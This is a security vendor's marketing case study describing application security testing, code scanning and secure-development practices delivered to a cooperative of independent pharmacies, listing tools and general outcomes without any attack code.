Generic selectors
Exact matches only
Search in title
Search in content
Search in posts
Search in pages

Case Study

Security solutions to a leading Pharmaceutical Company

Whom we worked with

The leading pharmacy is a nationwide member-owned cooperative comprised of over 2,000 independent pharmacies. All independent pharmacies have bonded together and formed this Pharmacy.

Our Solution

  • Analyze the application and create the Threat Modeling and AppSec plan
  • Following Best practices of OWASP Top 10 and SANS25
  • Building security into the software development lifecycle, so that we are finding and fixing vulnerabilities early
  • We have introduced standalone security flaws of scanning methods before they upload source code or binaries to cloud repositories like GitHub, BitBucket
  • Identification of Application Input, Output e.g. Files, Environment variables, parameters in URL, through form submission, config files, Database Source, and registry, etc
  • Logical tests Authentication, login, Email confirmation, business workflow securities, data encryption, etc
  • A report with all severity 1, 2, 3 vulnerabilities and the corresponding suggestions to fix, was created

Challenges

  • No proper documentation of applications and business processes and lack of IT security knowledge
  • Lack of resources with understanding of internal implementation details, web Interface internals (Application)
  • High priority is to find Vulnerabilities on Source Code by using SAST Tools like SonarQube, Checkmarx, and PumaScan & Veracode
  • Perform SQL injection vulnerability, Cross-site scripting, Business workflow securities, Authentication security, Brute force authentication breach testing, Web server files security, etc., through SQLI, BurpSuite, and ZAP PROXY
  • Perform the evaluation of security risks for the business-critical web applications
  • Provide detailed recommendations on the improvement of information systems’ security level and Protect application from willful damage
  • Informing the client management team on the existing information security risks
  • Educate developers on security vulnerabilities and how to write the secure coding

Impact

  • Reduces risks of downtime, data theft, and website defacement
  • Protects against web attacks such as SQL injection, XSS and RFI
  • Using DAST tools to monitor and test the third party interfaces and API on application
  • Code Vulnerabilities and malicious activities solutions provided with Veracode, SonarQube, Accunetix and OWASP ZAP

How we helped

  • Cost reduction is achieved by detecting & fixing security issues by Early Identification of Vulnerability in Code and we save a lot of time.
  • To perform Black Box and White Box penetration testing, Identify all Vulnerabilities and Exposures by using SAST & DAST tools
  • Greater speed & Agility for security Teams.
  • An ability to respond to a change and needs rapidly.
  • Using Software Composition Analysis and ready-to-implement code fixes, whenever possible
  • Scanning binary files for certain languages, as needed
  • Crawl modern frameworks and APIs in seconds with support for OpenAPI (Swagger) and use WebInspect’s Postman integration to support unique workflows, complicated authentication, and custom parameter requirements
  • Apply rate controls to API requests, as well as inspect JSON and XML API calls to ensure the webserver remains available and the data on it is secure
  • Threat hunting can avoid bad publicity.
  • Immutable infrastructure improves overall security by reducing vulnerabilities, reduces insecure defaults, and increasing code coverage and automation.
  • We ensure the “secure by design” principle